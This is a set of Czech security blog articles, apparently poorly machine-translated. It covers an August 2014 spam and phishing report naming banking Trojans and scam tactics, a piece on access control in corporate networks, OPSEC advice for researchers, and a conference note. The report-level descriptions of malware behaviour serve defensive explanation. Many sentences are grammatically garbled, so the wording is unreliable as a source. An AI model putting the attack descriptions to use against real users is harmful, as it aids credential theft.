Stejně jako anglické jazykové verze, podobně jako škodlivý spam se objevil v ruštině a češtině. Podvodníci pokusili přesvědčit uživatele, že oni měli nezaplacené dluhy se splatností do 15 dnů. Pokud by nezaplatil, příjemci byli varováni, že jejich majetek mohl být zabaven a jejich bankovní účty frozen.The připojen archiv obsahoval trojského-Downloader.Win32.Agent.heva, soubor škodlivý předložený podvodníky jako finanční a právní dokumenty. Jakmile uživatel běžel Trojan, RTF soubor byl vystaven, když škodlivý program stahovat a instalovat Trojan.Win32.Tinba.ei ještě další Trojan navržen tak, aby ukrást finanční informace, jako pověření účtu bank a údajům o kreditních kartách. Název Trojan je zkratka "Tinybanker". Jedná se o malý kousek assembler kódu, ale to má funkce mnoha větších kusů podobného malwaru.

srpen-2014_spam-report_en_2

Politika v "nigerijský" spam

V srpnu jsme opět narazili na "nigerijské dopisy" využívajících události na Ukrajině. V e-mailu napsaný v angličtině podvodníci používají jméno bývalého prezidenta Ukrajiny Viktora Janukovyče, aby prodat svůj příběh. Tentokrát se populární "nigerijské" trik s žádostí o pomoc při investování peněz na podstatné odměnu přišel z bývalého finančního poradce prezidenta, jehož peníze byly tajně přenesl na osobní účet poradce v Londýně.

srpen-2014_spam-report_en_3

Po dlouhém mlčení jméno Michaila Chodorkovského byl zase zpátky. Narazili jsme na "nigerijské dopisy", údajně napsané jménem jeho vnitřního kruhu. Přimět čtenáře, podvodníci se točil standardní příběh nabízí odměnu za pomoc při přenášení a investovat obrovské sumy peněz. Chcete-li e-mail vypadat realističtěji, tělo zprávy obsahovaly odkazy na oficiální články o Chodorkovského. Kromě toho bylo zdůrazněno, že všechny budoucí transakce jsou legální a nepředstavoval žádné riziko pro oběť.

srpen-2014_spam-report_en_4

Jeden e-mail obsahuje minimální informace, prostě tím příjemce kontaktovat podvodníci, pokud najde nabízejí zajímavé. Další e-mailu poskytuje detaily lákavé nabídky a příběhy z Chodorkovského života: před zatčením nemohl stáhnout všechny peníze z Ruska a nyní, po vydání, hodlá dokončit převod. Nicméně jako nemilosti miliardář nelze použít jeho bývalou firmu, jak to udělat, že hledá někoho, kdo by mu pomohl. Je zajímavé, že "nigerijské" podvodníci umožnit příjemcům se odhlásit ze svého mailing listu zasláním e-mailu na odkaz na konci zprávy. To je, jak podvodníci shromáždit databázi aktivních e-mailových adres pro budoucí spam hromadnou korespondenci.

Léky inzerátů falešných e-mailů Google Play

Spamy inzerující léky pravidelně nabízejí pilulky, jak zhubnout, zvýšit sílu nebo zlepšení mužské sexuální nutkání. Tělo z těchto e-mailů obsahuje krátký text s odkazem na internetové stránky obchodu, kde může být inzerována výrobek zakoupen. Někdy tam je jen odkaz. Chcete-li odeslat "farmaceutické" inzeráty, podvodníci často používají vizuální spam. Nicméně někdy vidět docela neobvyklé triky inzerovat léky. Například loni na podzim jsme psali v našem blogu o sérii poštovních zásilek, které používaly názvy známých firem a vypadal jako typický phishingových zpráv. V srpnu 2014 jsme zaznamenali další podobnou hromadnou korespondenci.

srpen-2014_spam-report_en_5

Tentokrát phishing e-mail vypadal jako oznámení o koupi z Google Play App Store. Přesvědčit příjemce, že e-mail byl skutečný, spammeři využil realisticky vypadající adresu odesílatele, jakož i oficiální logo obchodu. Odkazy v textu e-mailu, které často vedou na stránky o skutečné webové stránky, byl neaktivní tentokrát, i když byly zvýrazněny. Zdá se, že podvodníci si nemyslel, že jejich falešné oznámení by dostat přes filtry nevyžádané pošty, takže se jejich e-maily vypadají jako klasické phishingové e-maily.

Babí léto spammery "

Anglická jazyková segment internetu viděl spam hromadnou korespondenci, které nabízejí speciální nabídku zájezdy na Havaj nebo Kostarice nebo tropických lesů, jakož i možnost rezervovat si soukromé letadlo pro podnikání nebo potěšení. Tyto zprávy pocházejí z různých adresách a obsahovala odkazy na nově vytvořené stránky, kde uživatelé mohou porovnat ceny a vybrat nejvíce atraktivní nabídku.

srpen-2014_spam-report_en_6

Také poznamenal, poštovní zásilky, které nabízejí k účasti v on-line vydělávat-programy. Tyto takzvané binární možnosti, nabízí rychlý a snadný příjem na pokrytí všech nákladů na dovolenou inzerované jinde.

Jak (ne) splatit půjčku

Dalším společným tématem v srpnu v nevyžádané pošty byl dluh management pro jednotlivce a společnosti. Spammeři odesílat barevné zprávy nutit věci jako "platit jen to, co si můžete dovolit", a slíbil, že vyhladit ochromující dluhy. Hypertextový odkaz v e-mailu vedlo k nově vytvořené prázdné stránky s názvem jako "Zero-dluh-now" s nabídkami konsolidovaných úvěrů (tj se dostat jeden úvěr na zaplacení několik dalších), nebo příznivých úvěrových podmínek.

srpen-2014_spam-report_en_7

Různé sběr a soukromé právníky, mezitím nabízejí opačné: specializované služby vybrat neuhrazené dluhy bez pomalých a nákladná soudní řízení. Reklamní e-maily, za předpokladu, stručný popis činnosti organizace, podrobnosti o své práci, několik statistik (počet odebraných úvěrů, počet spokojených zákazníků, atd) a zahrnoval kontaktní telefonní číslo. Číslice v telefonních číslech byly často záměrně zkreslené nebo uslyšáno jest, aby se vyhnula spam filtry. Autoři zprávy slíbil úspěšný výsledek i v případech, kdy již další specializované služby, byly neúspěšné.

srpen-2014_spam-report_en_8

Statistiky

Podíl nevyžádané pošty v e-mailovém provozu

srpen-2014_spam-report_en_9

Podíl nevyžádané pošty v e-mailovém provozu

Podíl nevyžádané pošty v e-mailovém provozu v srpnu v průměru 67,2%, což je pouze o 0,2 procentního bodu více než od července. Množství nevyžádané pošty vzrostl v průběhu měsíce - na začátku srpna Podíl nevyžádané pošty v průměru 64,9%, zatímco na konci dosáhl 70,4%.

Zdroje spamu podle země

V srpnu, USA zůstal nejpopulárnější zdroj spamu (15,9%), což je o 0,7 procentního bodu oproti předchozímu měsíci. Rusko bylo na druhém místě s 6%; až 0,4 procentního bodu. Čína byla na třetím místě s 4,7% by došlo k 0,6 pb méně spamu než v červenci.

srpen-2014_spam-report_en_10

Zdroje spamu po celém světě

Vietnam byl na 4. místě s 4,7% všech distribuovaných spamu; jeho příspěvek se zvýšil o 1,2 procentního bodu, který tlačil tuto zemi do čtyř míst v žebříčku. To následuje Argentina (4,4%), který viděl malou změnu ve svých číslech a klesl o jednu příčku v tabulce.

Německo (3,6%) zůstal na 6. místě s mírným poklesem v procentech distribuované spamu. Ukrajina klesl na osmé. Mezitím, Brazílie (2,9%), přidáno 0,5 procentního bodu na příspěvek z předchozího měsíce a které v 9. srpna v Top 10, která byla zaokrouhlená s Indií (2,8%).

Za zmínku stojí mírný růst spammer činnost v Jižní Koreji (1,9%), který také vstoupil do top 20 v srpnu.

Škodlivé přílohy v e-mailu

Následující grafické zobrazení ukazuje Top 10 škodlivých programů se šíří prostřednictvím e-mailu v srpnu.

srpen-2014_spam-report_en_11

Top 10 škodlivých programů se šíří prostřednictvím e-mailu

V srpnu Trojan.JS.Redirector.adf trumfl hodnocení škodlivých programů nejčastěji šíří prostřednictvím e-mailu. Jeho jméno mluví samo za sebe: je to HTML stránka obsahující kód, který přesměruje uživatele na podvodníky stránky nabízející ke stažení Binbot, populární službu pro automatické on-line prodej binárních opcí. Tento škodlivý program je distribuován prostřednictvím e-mailu v ZIP archivu, který není chráněn heslem.

Trojan-Downloader.Win32.Upatre.to a Trojan-Downloader.Win32.Upatre.tq byli třetí a šestá místa. Tyto škodlivé programy jsou relativně jednoduché, nejsou ničím jiným než kolem 3,5 KB velikost a obvykle stažení trojského bankéře z rodiny známé jako Dyre / Dyzap / Dyreza. Seznam finančních organizací, které jsou předmětem tohoto bankéře závisí na konfiguraci v souboru, který je na serveru natažený z velitelského centra.

Trojan-Banker.Win32.Fibbit.rq byl čtvrtý. Tento bankovnictví Trojan vloží do Java aplikace pro on-line bankovnictví zaměřeného na autorizační údaje a další informace, jako jsou klíče, transakce náhrad a jejich výsledcích.

Backdoor.Win32.Androm.enji a Backdoor.Win32.Androm.erom byly páté a deváté místo žebříčku. Oba škodlivé programy patří Andromeda - Gamarue, univerzální modulární bot s funkcemi, včetně stahování, ukládání a spouštění spustitelných souborů, stahování DLL (bez uložení na disk) a pluginy, stejně jako možnost vlastní aktualizace a self-mazání. Funkčnost bot lze rozšířit pomocí systému zásuvných modulů, které jsou načteny zločinci podle potřeby.

Trojan.Win32.Bublik.clhs a Trojan.Win32.Bublik.bwbx, úpravy notoricky známý Bublík malware, skončila sedmá a osmá pozice v srpnu. Bublik malware rodina je většinou používán za neoprávněné stahování a instalace nových verzí škodlivého kódu do počítače oběti.

Trojan-Spy.Win32.LssLogger.bos zaokrouhlena Top 10. Je to multifunkční škodlivý program, který je schopen krást hesla z širokého okruhu softwaru. Všechny ukradené informace jsou pak předány podvodníkům prostřednictvím e-mailu.

srpen-2014_spam-report_en_12

Distribuce email antivirových odhalení podle země

V srpnu se ve Velké Británii dostal do vedení s 13,16% všech antivirových odhalení (6,26 procentního bodu). Německo (9.58% -1,49 pb) a USA (7,69% -1,59 procentních bodů) byl druhý a třetí, resp.

Nejvíce neočekávaný výsledek přišel z Ruska, její podíl zvýšil o 3,33 procentního bodu od července a činila 6,73%, který se pohyboval tuto zemi od 8. - 4. místě v žebříčku.

Itálie (3,31%) klesl 5.-8.místo, co ztratil 1,33 procentního bodu. Hong Kong předběhl Austrálie, Turecko a Vietnam s 2,74% všech antivirových odhalení (0,28 procentního bodu).

Zvláštnosti škodlivého spamu

V srpnu, podvodníci znovu použít falešné oznámení z Facebooku distribuovat nebezpečné přílohy. Tentokrát uživatelé obdrželi zprávu od neznámého adresu varování je o případné deaktivaci jejich účtů. Podle textu, v posledních několika dnech (v některých e-mailů - měsíce) sociální síť byla napadena hackery. Aby se zabránilo problémům, vývojáři vyzval uživatele k instalaci nástroje připojené k e-mailu.

srpen-2014_spam-report_en_13

Každý e-mail obsahoval chráněné heslem ZIP archiv se spustitelného souboru a unikátní heslo potřebné k rozbalení. Přiložený archiv nesl jméno uživatele, který e-mail byl řešen (jeho e-mailový účet login) a se stejným názvem byl použit na vytvoření hesla pro archiv. Na konci e-mailu podvodníci řekl, že soubor mohl být otevřen pouze na PC s operačním systémem Microsoft OS. Nástroj v archivu byl ve skutečnosti Trojan downloader, zástupce rodiny Trojan-Downloader.Win32.Haze. Toto stahování malware jiný škodlivý software obvykle vyvíjeny ukrást osobní údaje vlastníka nebo posílat e-maily infikované na adresu uvedenou na jeho seznamu kontaktů.

Phishing

V srpnu 2014 se společnosti Kaspersky Lab je anti-phishing komponenty registrované 32653772 detekcí, která je 12495895 detekce více než v předchozím měsíci. Tento výrazný růst byl pravděpodobně způsoben letní zpomalení poptávky po reklamní spam. Podvodníci, kteří nechtějí přijít o své zisky přepnout do masových phishingových pošty.

Austrálie trumfl hodnocení zemí nejčastěji napadeny phisherů: v průběhu měsíce se počet Anti-Phishing součástí aktivací na počítačích australských uživatelů zdvojnásobil a činil 24,4%. Brazílie byla druhá s 19,5% napadených uživatelů. To bylo následované Velkou Británií (15,2%), Kanada (14,6%) a Indie (14,5%).

srpen-2014_spam-report_en_14

Geografie phishingových útoků *, srpen 2014

* Procento uživatelů, na jejichž počítačích Komponenta Anti-Phishing byl aktivován, z celkového počtu všech uživatelů Kaspersky Lab

Top 10 zemí podle procentního podílu napadených uživatelů:

Země % Uživatelů
1 Austrálie 24,4
2 Brazílie 19.5
3 UK 15.2
4 Kanada 14,6
5 Indie 14.5
6 Spojené arabské emiráty 14.1
7 Ekvádor 13.1
8 Dominikánská republika 13.0
9 Rakousko 12.8
10 Čína 12,7
Cíle útoků organizace

Statistiky o phishingových cíle jsou založeny na zjištěních učiněných Kaspersky Lab anti-phishing složky. To se aktivuje pokaždé, když uživatel zadá stránku phishing, která nebyla dříve součástí Lab databázích Kaspersky. Nezáleží na tom, jak uživatel zadá na tuto stránku - kliknutím na odkaz obsažený v e-mailu nebo phishing ve zprávě na sociální síti nebo například v důsledku aktivitou malwaru. Po aktivaci bezpečnostního systému, uživatel vidí banner ve varování prohlížeče potenciálního ohrožení.

V srpnu došlo k malé změně mezi organizacemi nejčastěji napadeny phisherů. Global Internet Portály zůstal vedoucím kategorii s 30,8%; jeho podíl zvýšil o 1,3 procentního bodu. Sociální sítě přišel na druhém místě s 17,3%, o 3,3 pb pokles z předchozího měsíce. Tyto dvě kategorie tvořily více než polovinu všech phishingových útoků v srpnu.

srpen-2014_spam-report_en_15

Organizace nejčastěji terčem phisherů podle kategorií - srpen 2014

Finanční phishing tvořily 35,2% všech útoků, 6,6 pb pokles v porovnání s předchozím měsícem. Procento zjištěných ovlivňujících Banky, internetové obchody a e-platební systémy se snížil 4,9, 1,2 a 0,6 pb, resp.

Top 3 organizace nejčastěji které se zaměřují phisherů

Organizace % detekce
1 Google 12.61%
2 Facebook 10.05%
3 Yahoo! 6,38%
V srpnu, služby Google se nejvíce zaměřují phishing odkazy: jejich podíl vzrostl o 1 pb a měl 12,61% z celkového počtu zjištěných komponent Anti-Phishing. Druhý byl Facebook, který je tradičně nejoblíbenější phishing cíl. Jeho příspěvek se zvýšil o 0,4 procentního bodu. Dále následuje Yahoo! (6,38%). Pro připomenutí, v červenci třetí místo obsadil Windows Live.

V srpnu spam provozu jsme narazili na několik podvodných zásilek zaměřených přihlašovacích jmen a hesel pro služby Yahoo! E-maily se dočetl, že správa Yahoo! zaregistrovala pokusů o zadání uživatelský účet od neidentifikovaného zařízení. Tato činnost způsobila podezření a účet bude blokován v případě, že příjemce nepotvrdily uživatelské jméno a heslo na zvláštní stránce. Tělo e-mailu obsahoval dva odkazy na ověření osobních údajů: První z nich - k potvrzení hesla a zabránit zablokování a druhý - na ochranu účtu v případě, že záznam byl proveden někým jiným. Oba tyto odkazy měly stejnou adresu a vedla ke stejnému phishing stránky. Text zprávy v různých hromadnou korespondenci téměř nezměnil a design e-mailů, používá logo Yahoo!.

srpen-2014_spam-report_en_16

Stránka phishing v jednom hromadnou korespondenci byla přesná kopie oficiální registrační stránce, ale na druhou mailing bylo použito jiné pozadí.

srpen-2014_spam-report_en_17

Podíváte-li se na HTML kódu phishing stránek, je zřejmé, že v prvním případě údaje oběti byl poslán na stránku PHP na podvodníky, zatímco v druhém případě byla předána na e-mailovou adresu registrovanou na bezplatné e-mailové služby . HTML kód také zadat adresu, která bude zadána v poli "Od", stejně jako předmět e-mailu. To umožnilo podvodníky zjistit informace o uživatelská jména a hesla, které obdržel od uživatelů v rámci jednotlivých hromadnou korespondenci.

srpen-2014_spam-report_en_18

Závěr

Podíl nevyžádané pošty v e-mailovém provozu v srpnu v průměru 67,2%, což je pouze o 0,2 procentního bodu více než od července. Hodnocení z nejpopulárnějších zdrojů spamu zůstal nezměněn od července - USA (15,9%), Rusko (6%) a Čína (4,7%).

V srpnu, podvodníci i nadále rozšiřovat "nigerijské dopisy" volání o pomoc při vypadnutí z krize na Ukrajině. Angličtina-jazyk e-maily prý napsán jménem přidruženého podniku bývalého ukrajinského prezidenta Viktor Janukovyč požádal o pomoc při investování peněz. Michaila Chodorkovského pokračující příběh byl ještě další záminka používaný podvodníky lákat peníze z obětí.

Škodlivé e-maily napodobující soudní předvolání bylo často vidět v srpnu spamové provozu. Tyto zprávy byly psány v různých jazycích a připojené škodlivé soubory byly vyvinuty tak, aby krást osobní údaje a vymáhat peníze na dešifrování souborů na počítačích obětí.

Chcete-li inzerovat farmaceutického spamu, podvodníci používají falešné oznámení z on-line obchodu Google Play. Odkazy v nich vedly na stránky, reklamní populární léky.

V srpnu, spammeři aktivně podporoval služeb cestovních a vymáhání pohledávek agentur.

Srpnová seznam nejvíce široce-distribuované malware byl završený Trojan.JS.Redirector.adf. Dlouhodobý lídr Trojan-Spy.HTML.Fraud.gen udržuje druhé místo v hodnocení.

V srpnu 2014 se společnosti Kaspersky Lab je anti-phishing komponenty registrované 32653772 detekcí, která je 12495895 detekce více než v předchozím měsíci. Austrálie je zemí nejvíce často napadeny phisherů: v průběhu měsíce se počet komponent aktivace anti-phishing na počítačích australských uživatelů zdvojnásobil a činil 24,4%. Kategorie celosvětové internetové portály zůstal sektor nejčastěji zaměřeny phisherů (30,8%). Finanční phishing tvořily 35,2% všech útoků, 6,6 pb pokles v porovnání s předchozím měsícem. Yahoo! vstoupila do Top 3 organizace, nejčastěji terčem phisherů.


Porušení v oblasti ochrany podnikové sítě: kontrola přístupu
4.10.2014 Ochrany

V téměř každé společnosti, zabezpečení IT oddělení čelí dvěma prioritní úkoly: zajistit, aby kritické systémy v nepřetržitém provozu a snížit riziko útoků na firemní síti. Jeden z nejúčinnějších přístupů k obou těchto problémů je omezit práva uživatelů systému.

Z hlediska bezpečnosti IT, kritické systémy mají dvě základní vlastnosti - integrity a dostupnosti -, které ovlivňují jejich kontinuitu provozu. Chcete-li chránit podnikové sítě před útoky, je nutné snížit útoku tím, že snižuje počet zařízení a síťových službách dostupných z mimo podnikovou síť, a tím, že chrání systémy a služby, které vyžadují takový přístup (webové služby, brány, směrovače, pracovní stanice , atd). Hlavní vektor útoku na podnikové síti je uživatel počítače připojené k Internetu v této síti.

Teoreticky, k ochraně kritických systémů před neautorizovanými změnami a snížit možnost útoků na firemní síti, měli byste:

uvedení těchto objektů (zařízení, systémů, podnikových aplikací, cenné dokumenty, atd) na podnikové sítě, které vyžadují ochranu;
popis obchodních procesů společnosti a využívat ty, které mají pomoci určit úroveň přístupu k chráněné objekty;
zajistit, že každý subjekt (uživatel nebo firemní aplikace) má jedinečný účet;
Omezit přístup subjektů "k objektům, tedy k omezení práv subjektů v rámci obchodních procesů;
zajistit, aby všechny operace mezi subjekty a objekty jsou zaznamenány a záznamy jsou uloženy na bezpečném místě.
V praxi to funguje další podobné:

Veškeré firemní dokumenty jsou uloženy centrálně ve sdílených složkách na jednom ze serverů společnosti (například na serveru Controller dokument)
přístup do kritických systémů je zakázán všem, ale správce - jakýkoli správce - se může přihlásit do systému na dálku rychle opravit jakoukoli závadu
Někdy správci pomocí "společný" účet
Všichni zaměstnanci mají omezená oprávnění jako "standardní uživatel", ale na přání může kdokoliv získat práva místního správce.
Technicky vzato, je to mnohem jednodušší pro ochranu kritických systémů, než pracovní stanice: změny v obchodních procesech jsou vzácné, pravidla se liší jen málo a může být vypracován na účet i pro ty nejmenší detaily. Naproti tomu pracovní prostředí uživatelů je chaotické, jejich procesy rychle měnit, a požadavky na ochranu měnit spolu s nimi. Kromě toho, mnoho uživatelů jsou podezřelé z jakýchkoli omezení, a to i v případě, že nemá žádný dopad na workflow. Proto tradiční ochranu uživatelů je založen na zásadě "je lepší nechat ujít škodlivý software, než něco opravdu důležitého zablokovat".

V loňském roce, Avecto studii s názvem "2013 Microsoft Chyby obor: snižování rizika tím, že odstraní uživatelská práva", a dospěl k závěru, že "tím, že odstraní práva místního správce, že je možné snížit riziko zneužití 92% kritické zranitelnosti v softwaru společnosti Microsoft". Závěr se zdá být logické, ale je třeba poznamenat, že Avecto netestovali zranitelnosti; je to jen analyzovali data z aplikace Microsoft Vulnerability věstníku 2013 . Nicméně je jasné, že škodlivý software, který běží bez administrátorských práv nelze nainstalovat ovladač, vytvářet / upravovat soubory v chráněných adresářů (% systemdrive%,% windir%,% ProgramFiles%, atd ), konfigurace změna systému (včetně zápisu do podregistru HKLM), a co je nejdůležitější - není možné použít privilegované funkce API.

Ve skutečnosti, i když nedostatek administrátorskými právy není vážnou překážkou pro jeden škodlivý software nebo hacker proniknout do firemní sítě. Za prvé, každý systém má desítky chyb zabezpečení, které otevírají potřebná práva až do jádra oprávnění na úrovni. Za druhé, existují hrozby, které vyžadují pouze standardní uživatelská oprávnění, které mají být provedeny. Níže uvedený diagram ukazuje možné útoky, které nevyžadují žádná administrátorská práva. Pojďme se blíže podívat na ně.

access_control

access_control

Lokální útoky

S pouze standardních uživatelských oprávněních, útočník získá plný přístup do paměti všech procesů běžících pod uživatelským účtem. To je dost integrovat škodlivého kódu do procesů , aby bylo možné dálkově ovládat systém (backdoor), zachytit stisky kláves (keylogger), k úpravě obsahu v prohlížeči, atd

Protože většina antivirových programů může ovládat pokusy realizovat neznámý kód v procesech, útočníci často používají více mlčenlivé metody. Tak, alternativní metoda použita k provedení backdoor nebo keylogger v procesu prohlížeče je používat pluginy a rozšíření . Standardní uživatelská práva jsou dostatečně stáhnout plugin, a že kód může dělat téměř vše, plně vybavený Trojan je schopen. To zahrnuje dálkové ovládání webového prohlížeče, přihlášení datové položky v prohlížeči provozu, interakci s webovými službami a úpravou obsahu stránky (phishing) .

Podvodníci se také zájem o standardní kancelářské aplikace (jako jsou e-mail a IM klientů), které mohou být použity k útoku na jiné uživatele v síti (včetně phishingu a sociální inženýrství). Podvodníci mohou přístup k programům, jako je Outlook, The Bat, Lync, Skype, atd pomocí API a místních služeb takových aplikací, stejně jako od injekční kód do příslušných procesů.

Samozřejmě, že to není jen aplikace, které jsou cenné pro podvodníků; data uložená na PC je také potenciální zlatý důl. Kromě firemních dokumentů, útočníci často hledají různé aplikační soubory, které obsahují hesla, šifrovaná data, digitální klíče (SSH, PGP), atd Pokud počítač uživatele je k dispozici zdrojový kód, útočníci by se mohl pokusit realizovat svůj kód do něj.

Domény útoky

Vzhledem k tomu, že účty většině podnikových uživatelů jsou účty domény, mechanismy ověřování domény (ověřování systému Windows) poskytuje uživatelům přístup k různým síťovým službám na podnikové síti. Tento přístup je často poskytovány automaticky, bez jakéhokoli dalšího ověření uživatelského jména a hesla. V důsledku toho, je-li infikovaný uživatel má přístup k firemní databázi, útočníci mohou snadno využít ji.

Povolení Domain také umožňuje útočníkům přístup všechny síťové složky a disky jsou k dispozici uživateli, sdílení interních zdrojů prostřednictvím intranetu a někdy evenaccess ostatní pracovní stanice na stejném segmentu sítě.

Kromě síťových složek a databází, podnikové sítě často obsahuje různé síťové služby, například vzdálený přístup, FTP, SSH, TFS, GIT, SVN, atd i když zvláštních účtů, non-domény se používají pro přístup k těmto službám, útočníci mohou snadno využít je , zatímco uživatel pracuje na svém počítači (tedy v průběhu aktivní relace).

Ochrana

Je téměř nemožné zajistit vysokou úroveň ochrany pro pracovní stanice tím, že popírá uživatelům administrátorská práva. Instalace antivirového softwaru na pracovní stanice zvýší svoji bezpečnost, ale nevyřeší všechny problémy. Pro dosažení vysoké úrovně bezpečnosti, technologie Control Aplikace by se měl skládat ze tří hlavních prvků:

Default Deny, který umožňuje pouze instalaci a provoz software, který byl schválen administrátorem. V tomto případě je správce nemá, aby každá žádost (hash) na seznamu důvěryhodný software. K dispozici je široká škála obecných dostupných nástrojů k tomu, aby dynamické Whitelisting veškerého softwaru podepsané schváleným osvědčením, vytvořený schváleným developera, získaných z důvěryhodného zdroje, nebo obsažených v Whitelisting databázi poskytovatele bezpečnostního softwaru.
Ovládání aplikace, které mohou omezit práci důvěryhodných aplikací podle jejich funkcí. Například, pro normální provoz prohlížeč by měl být schopen vytvořit síťové připojení, ale to není nutné číst / zapisovat další procesy v paměti, se připojit k on-line databázím nebo ukládání souborů na síti.
Správa aktualizací, která zajišťuje veškerý software na pracovních stanicích se okamžitě aktualizuje, čímž se snižuje riziko infekce prostřednictvím aktualizačních mechanismů.
Kromě toho, specifické výrobky, které jsou vybaveny řídicí aplikace může poskytnout řadu užitečných funkcí, založených na této technologii: inventář, kontrolu nad software nainstalovaný v síti, protokoly událostí (což bude užitečné v případě vyšetřování nehod), atd

Na jedné straně, může kombinace technologií poskytuje uživatelům vše, co potřebují pro práci, a dokonce i pro zábavu a je dostatečně flexibilní, aby se vypořádat s měnícími se požadavky. Na druhou stranu, šance útočník získat přístup k chráněnému systému jsou velmi omezené. Není pochyb o tom, je to nejlepší rovnováhu mezi flexibilitou a jistotou v oblasti ochrany podnikové sítě.


OPSEC pro výzkumné pracovníky bezpečnostních
4.10.2014 Bezpečnost

Jako bezpečnostní výzkumník v dnešní době není snadný úkol, zvláště když jsme se již zabývají čistě technické záležitosti. Dnešní globální bezpečnostní krajina zahrnuje několik nových účastníků, včetně vlády, velkých společností, zločinecké gangy a zpravodajskými službami. To staví výzkumníky v obtížné situaci.

Podle jedné z mnoha definic OPSEC:

"Bezpečnost provozu označuje důležité informace, jak zjistit, zda je možné pozorovat přátelské akce do nepřátelských zpravodajských systémů "

Slyšíme zprávy o výzkumníci vyhrožováno od zločineckých gangů, nebo byl osloven státních zpravodajských služeb. Jiní se ocitli pod dohledem nebo měli své zařízení narušenou na cestách.

OPSec_1

Jak můžeme tato rizika minimalizovat? Co můžeme udělat, aby nedošlo k úniku informací, který by nám mohl dát do nepříjemné situace v budoucnu?

Někdy jsme veřejné tváře výzkumného projektu, ale jindy nechceme být na dobře viditelném místě.

Zlaté pravidlo v provozní bezpečnosti používá ticho jako obranný disciplíny. Pokud nemáte opravdu potřeba něco říct, ale potichu. Když potřebujete komunikovat s někým, to bezpečným způsobem, který neohrožuje obsah vaší zprávy, a pokud je to možné, nevytváří metadata kolem něj.

Je to neuvěřitelně těžké cíl dosáhnout: je to přirozený instinkt chtít zapůsobit na jiné a na mnoha příležitostech budeme čelit protivníkům, kteří jsou dobře vyškoleni pro získání informací, které chcete. Všichni jsme chtěli říct, zajímavé příběhy.

Druhé zlaté pravidlo je, že OPSEC nefunguje zpětně, a tak bychom měli velmi opatrní na to, co děláme teď, pokud nechceme, aby se vrátil a kousat nás v budoucnosti.

Pokud jde o OPSEC, každý bezpečnostní analytik by se měl snažit být jen další chlap v řadě. Pokud budeme přitahovat příliš velkou pozornost na sebe, mohl snadno přerůst dohled nad elektronickými prostředky - a to je v podstatě v průběhu hry. V dnešním světě masivních dohledu, stojící upozorní pozornost každého, kdo má přístup k relevantní data. A v dnešním světě úniku informací a "velkých internetových společností", je těžké přesně vědět, kdo má přístup ke kterým datům:

ukázka dat, které unikly z agregátor a publikoval jako služba

(Příklad dat, které unikly z agregátor a publikoval jako služba)

Tam jsou některé zajímavé příklady, jak byly zjištěny nesrovnalosti z metadat a pak se úspěšně používá při vyšetřování ( http://en.wikipedia.org/wiki/Abu_Omar_case ). A pak je tu rutinní použití tohoto v hromadné sledování a dolování dat.

Tak co s tím můžeme dělat?

První pravidlo, kterým se provádí OPSEC se nelíbí, snažte se dosáhnout víc, než můžete. Faktem je špatné OPSEC může být horší než žádné OPSEC vůbec.

Hlavním rysem potřebné pro efektivní OPSEC není technický, ale psychologická: být pečlivá, a udržovat zdravou úroveň paranoie.

Nicméně elektronický dohled je zřejmě mnohem běžnější a každý kousek informace, bude tam navždy. Pojďme se podívat na naši minimální sadou nástrojů, aby se zabránilo úniku informací a tenký o několik základních tipů.

Šifrování

Zřejmě bychom měli používat co nejvíce šifrování jak je to možné. Ale pamatujte si, že je inherentní slabina. Jakmile bude vaše klíče jsou ohroženy, všechny informace, které byly zašifrovány v minulosti ohrožena s nimi. Jak plyne čas, bude pravděpodobnost, že klíče budou kompromitována růst. Takže je mnohem lepší použít IM s OTP.

Dnešní velká otázka: co se děje s TrueCrypt, nejpopulárnější šifrovacího softwaru?

Podle projektu Audit, není zřejmé, vada nebo backdoor. Ale před pár měsíci jsme viděli, toto:

OPSec_3

Stále existuje mnoho otevřených otázek, ale můžete najít důvěryhodné TrueCrypt úložiště na: https://github.com/AuditProject/truecrypt-ověřené-zrcadlo

E-mail

E-mail jednoduše ponechává příliš mnoho metadat, a to i když je zpráva šifrována pomocí PGP (mimochodem, pomocí tlačítek větší než 2048). IM s OTP je lepší.

Externí poskytovatelé se nedá věřit.

IM

Pidgin a Adium se zdají být v pořádku. Ale pamatujte si, aby přihlásit své chaty a nemají výhled na netechnické faktor: nevíte, kdo je na druhé straně rozhovoru (i když jste ověřili klíč).

TOR

Já bych určitě doporučil použití anonymizační síť setřást většinu skupin, které tě mohl sledovat. Však nelze považovat za skutečně "bezpečné" v tom smyslu, že většina z výstupních uzlů jsou řízené lidmi, které mohou korelují své záznamy se zdrojem připojení. Viděli jsme příklad tohoto v Harvard bomby:

http://www.theverge.com/2013/12/18/5224130/fbi-agenti-pásové-Harvard-bomba-ohrožení-přes-tor

Také TOR je terčem mnoha pokusech útoku, jako je tento nedávný jedno:

OPSec_4

Tak už slepě věřit TOR na cokoliv velmi citlivé, ale používají ji pro své každodenní činnosti. Nikdy odhalit svou skutečnou IP adresu.

Telefon

Celkem noční můra, pokud jde o OPSEC. Prosté doporučení, je zbavit se toho! Ale to se nestane.

Alespoň nedělej nic citlivé s tím, použijte hořáku telefony a nepoužívám je doma nebo v práci.

Závěry

Perfektní OPSEC je téměř nemožné. Nicméně provádění základních OPSEC postupů by se měla stát druhou přirozeností každého výzkumného pracovníka. Jakmile se internalizovat, že je třeba aplikovat OPSEC budete dávat větší pozor, a doufejme, že vyhnout se bažanta chyby jako mluvit příliš mnoho, a chlubí svém výzkumu.

Nejdůležitější věci, za jakéhokoliv nástroje, jsou pečlivé, použití správné úrovně OPSEC podle vaší situace a pochopení toho, co můžete skutečně doufat.

To je jen stručný úvod do složité téma, ale doufáme, že by to mohlo být užitečné oko-otvírák, zvláště pro naše kolegy bezpečnostních výzkumníků.


Virus Bulletin 2014: nové časy, stejné problémy
4.10.2014 Konference
Během posledního týdne v září antimalware průmysl se dali dohromady v jedné z nejstarších a nejvíce legendární informační bezpečnosti konference ve světě, 24. Virus Bulletin International Conference (VB2014), která se konala v krásném Seattlu, USA. Společnost Kaspersky Lab byla tam prezentovat a sdílet širokou škálu probíhajících výzkumných témat s bezpečnostní komunitou.

seattle

V první den konference jsme se ukázaly znovu a znovu, jak Linux operační že to není tak škodlivý software zdarma více. Demontáž mýtus, měli jsme několik rozhovorů na toto téma, mezi nimi "Ebury a CDorked Full zveřejňování." a " infekce malware Apache Linux-založené: kousání do ruky, která nás všechny slouží "upozornil na netradiční malware a jak Webový server Apache je chycen uprostřed tohoto * nix světě, se stal efektivní platformou pro útočení a infikovat nic netušící zákazníky.

